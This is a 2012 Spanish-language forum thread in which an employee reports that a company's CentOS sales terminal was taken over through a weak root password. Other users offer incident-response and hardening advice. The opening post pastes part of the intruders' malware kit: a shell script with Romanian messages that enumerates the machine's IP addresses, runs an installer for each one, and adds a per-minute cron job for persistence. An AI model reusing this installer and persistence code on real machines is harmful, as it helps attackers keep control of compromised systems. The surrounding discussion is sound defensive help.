|
Título: Hackearon la empresa -confirmado Publicado por: E5150 en 1 Abril 2012, 04:05 am saludos para todos
les cuento: trabajo para una empresa dedicada ala compra y venta de insumos farmacologicos, en los puntos de venta tenemos instalado el sistema operativo: Centos y en otros red hat o sea todo lo trabajamos con linux y ademas tenemos un software empresarial q tambien solo funciona con linux...hace poco instalamos un nuevo punto con Centos y con un nuevo motor de base de datos: Postgres ya que normalmente utilizamos Informix... tuvimos el descuido en dejar una clave de root muy facil y despues de unos dias nos dimos cuenta que ni siquiera podiamos entrar por ssh (desde otro pc) y tampoco en el punto de venta, luego de varios procedimientos logramos ingresar por root y pues encontramos una carpeta sospechosa, se llama asi /opt y estaba en /root dentro de esta carpeta hay dos subcarpetas llamadas aubit4gl (averigue es un emulador de base de datos) y la otra: bomfunk (no se que es) dentro de aubit4gl hay mas subcarpetas con archivos planos los cuales tienen codigo sql y otras cosas mas por ej: hay una subcarpeta /bin con archivos: adbaccess, adecompile, amake, sql_parse, otra subcarpeta /etc con archivos boostrap, configsub y hay muchos mas archivos la otra bomfunk tiene mas archivos con codigos y textos en ingles como si fueran conversaciones entons pregunto -todo esto hace parte de algun programa? -cual es la finalidad de estos programas? -que tan grave es? -que debo hacer para evitarlos? agradezco la ayuda y colaboracion--- un archivo de esos dice asi (si alguien sabe y me informa que significa) #!/bin/bash if [ $# != 1 ]; then echo "######Un cadou de la Riko pentru Bomfunk######" echo "#+#+#+ bine lucrat hackere !!" echo "Tasteaza : ./start canal " echo "P.S : fara diez!" exit; fi /sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts nrs=`cat vhosts | grep -c .` ######variabile###### D=1 B=./vhosts ######install###### echo "######Un cadou de la Riko pentru Bomfunk######" echo "@@@@ bine lucrat hackere !!" sleep 1 echo "Am gasit $nrs ip-uri" sleep 1 while read line; do ./inst $1 $line case "$D" in "1") echo -e "\b\.\c" D=2 echo -e "\b\...\c" D=4 ;; "4") echo -e "\b\....\c" D=1 ;; esac done < $B echo -e "\bGata" ./autorun ./run #!/bin/sh pwd > mech.dir dir=$(cat mech.dir) echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d crontab cron.d crontab -l | grep update echo "#!/bin/sh if test -r $dir/m.pid; then pid=\$(cat $dir/m.pid) if \$(kill -CHLD \$pid >/dev/null 2>&1) then exit 0 fi fi cd $dir Título: Re: Hackearon la empresa -confirmado Publicado por: Elemental Code en 1 Abril 2012, 07:16 am malas noticias?
Código: http://translate.google.com/#auto|es|Un%20cadou%20de%20la%20Rio%20pentru%20Bomfunk%20bine%20lucrat%20haker%20!!%0A Título: Re: Hackearon la empresa -confirmado Publicado por: rassiel en 1 Abril 2012, 11:21 am pues han conseguido comprometer tu sistema, el idioma de los echo es rumano, tal vez t de una pista revisa los logs del server cambia el pass del root por uno robusto elimina esos archivos y verifica no se haya filtrado ninguna info sensible instala un firewall e intenta instalar algun mecanismo contra ataques de fuerza bruta o diccionarios al pass, intenta declarar algun filtrado ip y si es posible mac e ip juntos para loguearse como root por ejemplo solo se puede loguear como root 127.0.0.1 o sea la ip del localhost la cual es muy dificil de spoofear salu2
Título: Re: Hackearon la empresa -confirmado Publicado por: E5150 en 3 Abril 2012, 03:30 am gracias por las respuestas , pero me surjen dudas: como hicieron para metersere? con fuerza bruta?? esos codigos q significan ??y si ya cambie la clave de root ya no tendria problemas?
Título: Re: Hackearon la empresa -confirmado Publicado por: E5150 en 16 Abril 2012, 04:56 am nadie???? alguien q me ayude por fa..necesito recopilar informacion
Título: Re: Hackearon la empresa -confirmado Publicado por: el-brujo en 17 Abril 2012, 17:43 pm Citar como hicieron para metersere? Bueno eso es lo que deberías tu investigar. Aunque si se hicieron root de la máquina pueden borrar los logs tranquilamente, e instalar una puerta trasera.... Puedes mirar si hay algún rootkit instalado con el rootkithunter, pero si ves tráfico sospechoso, te recomiendo una reinstalación del sistema limpia. 1) Mira los logs del apache 2) Análisis forense completo de tu máquina 3) Actualizar scripts php, instalar php en modo seguro, suexec, mod_security, tmp en no exec, securizar php, ejemplo: *) Configuración avanzada PHP + Seguridad en PHP http://foro.elhacker.net/tutoriales_documentacion/instalar_apache_php_mysql_perl_en_windows_y_linux_configuracion_avanzada-t251.0.html ¿Como puedo saber si un sistema Linux ha sido comprometido? (TEXTO) http://foro.elhacker.net/hacking_linuxunix/iquestcomo_puedo_saber_si_un_sistema_linux_ha_sido_comprometido_texto-t36767.0.html DETECTANDO ROOTKITS http://foro.elhacker.net/seguridad/detectando_rootkits-t85821.0.html Herramientas Seguridad en Linux http://foro.elhacker.net/gnulinux/herramientas_seguridad_en_linux-t56677.0.html Zeppoo v.0.0.2 - Detector de Rootkits http://foro.elhacker.net/hacking_linuxunix/zeppoo_v002_detector_de_rootkits-t116776.0.html Que hacer despues de ser atacado http://foro.elhacker.net/seguridad/que_hacer_despues_de_ser_atacado-t245743.0.html c99.txt y r57.txt http://foro.elhacker.net/nivel_web/c99txt_y_r57txt-t214653.0.html |